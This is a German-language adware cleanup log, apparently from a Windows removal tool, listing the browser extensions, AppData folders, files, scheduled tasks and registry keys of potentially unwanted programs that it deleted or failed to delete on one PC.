[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Conduit
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\cool_mirage
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\genienext
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\globalUpdate
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Mobogenie
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\torch
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Tuguu_SL
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\SmartWeb
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\80137FAD-1431551225-E211-83C6-B888E3CF1A37
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\papbadoldddalgcjcicnikcfenodpghp
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jecgbfoconhopjngaaijjgffhokohlac
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\papbadoldddalgcjcicnikcfenodpghp
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jecgbfoconhopjngaaijjgffhokohlac
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\chhgglpcmhcjlbkhlhflkkfmgfgefokj
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\icnbggbifnclgfobhihlgdjpfdfojigh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\kpfphkbkngbjobobophejkggnkdcdilh
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\moijimjchlfjjgblmbkacgceefgfockd
[!] Ordner Nicht Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ndhinffkekpekljifjkkkkkhopnjodja
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\LocalLow\IminentToolbar
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\Advanced System Protector
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\newnext.me
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\OpenCandy
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\Systweak
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\UpdaterEX
[-] Ordner Gelöscht : C:\Users\Özkan\AppData\Roaming\WebExtend
[#] Ordner Gelöscht : C:\Windows\SysNative\Tasks\Advanced System Protector

***** [ Dateien ] *****

[-] Datei Gelöscht : C:\END
[-] Datei Gelöscht : C:\Users\Özkan\daemonprocess.txt
[-] Datei Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.bestpriceninja.com_0.localstorage
[-] Datei Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.bestpriceninja.com_0.localstorage-journal
[-] Datei Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage
[-] Datei Gelöscht : C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage-journal
[-] Datei Gelöscht : C:\Windows\Reimage.ini
[-] Datei Gelöscht : C:\Windows\SysNative\roboot64.exe
[-] Datei Gelöscht : C:\Windows\SysNative\drivers\netfilter64.sys

***** [ DLLs ] *****


***** [ Verknüpfungen ] *****


***** [ Aufgabenplanung ] *****

[-] Geplante Aufgabe Gelöscht : Advanced System Protector
[-] Geplante Aufgabe Gelöscht : SmartWeb Upgrade Trigger Task
[-] Geplante Aufgabe Gelöscht : LaunchPreSignup
[-] Geplante Aufgabe Gelöscht : Superclean
[-] Geplante Aufgabe Gelöscht : Plus-HD-5.0-chromeinstaller
[-] Geplante Aufgabe Gelöscht : Plus-HD-5.0-enabler
[-] Geplante Aufgabe Gelöscht : Plus-HD-5.0-firefoxinstaller
[-] Geplante Aufgabe Gelöscht : Plus-HD-5.0-updater

***** [ Registrierungsdatenbank ] *****

[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\driverscanner
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.bandobjectattribute
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.bho
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.dockingpanel
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.iesmartbar
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.iesmartbarbandobject
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.smartbardisplaystate
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\iesmartbar.smartbarmenuform
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Iminent
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\speedupmypc
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
[-] Schlüssel Gelöscht : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Wpm
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Record\{2009AF2F-5786-3067-8799-B97F7832FDD6}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Record\{425E7597-03A2-338D-B72A-0E51FFE77A7E}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Record\{915BB7D5-082E-3B91-B1E0-45B5FDE01F24}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Record\{FB2E65F4-5687-33EF-9BBF-4E3C9C98D3B9}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\cda41201-3d26-3a1b-c3f1-2e83a236eb45
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{C007DADD-132A-624C-088E-59EE6CF0711F}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{00B11DA2-75ED-4364-ABA5-9A95B1F5E946}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{56561B2A-FB5D-363A-9631-4C03D6054209}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{A717364F-69F3-3A24-ADD5-3901A57F880E}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{CCB08265-B35D-30B2-A6AF-6986CA957358}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{CD92622E-49B9-33B7-98D1-EC51049457D7}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{E041E037-FA4B-364A-B440-7A1051EA0301}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B0A28F54-B08F-4049-A9BF-8D33BD1E9222}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68B81CCD-A80C-4060-8947-5AE69ED01199}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{93DBF2BB-A2B3-4683-A92E-57E60751F346}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E6B969FB-6D33-48D2-9061-8BBD4899EB08}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{31AD400D-1B06-4E33-A59A-90C2C140CBA0}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{56561B2A-FB5D-363A-9631-4C03D6054209}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{A717364F-69F3-3A24-ADD5-3901A57F880E}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{CCB08265-B35D-30B2-A6AF-6986CA957358}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{CD92622E-49B9-33B7-98D1-EC51049457D7}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{E041E037-FA4B-364A-B440-7A1051EA0301}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{2BEF239C-752E-4001-8048-F256E0D8CD93}
